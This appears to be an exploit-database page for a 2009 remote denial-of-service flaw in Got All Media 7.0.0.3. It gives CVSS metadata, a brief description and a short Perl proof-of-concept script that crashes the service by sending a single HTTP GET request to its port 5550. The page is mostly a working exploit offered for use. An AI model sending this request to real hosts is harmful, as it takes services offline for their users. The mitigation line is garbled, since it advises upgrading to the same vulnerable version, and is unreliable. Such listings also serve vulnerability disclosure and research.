header-logo
Suggest Exploit
vendor:
Got All Media
by:
Gjoko 'LiquidWorm' Krstic
7.8
CVSS
HIGH
Remote Denial Of Service
400
CWE
Product Name: Got All Media
Affected Version From: 7.0.0.3
Affected Version To: 7.0.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:gallm:got_all_media:7.0.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Got All Media 7.0.0.3 Remote Denial Of Service Exploit

A vulnerability was discovered in Got All Media 7.0.0.3 which allows a remote attacker to cause a denial of service. The vulnerability is due to an unspecified error when handling a specially crafted HTTP request. This can be exploited to cause a denial of service via a specially crafted HTTP request.

Mitigation:

Upgrade to the latest version of Got All Media 7.0.0.3
Source

Exploit-DB raw data:

#!/usr/local/bin/perl
#
# Title: Got All Media 7.0.0.3 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
# http://www.zeroscience.org
# 19.02.2009
#

print "\n[*] t00ting...\n";

use LWP::Simple;

my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;

# milw0rm.com [2009-02-20]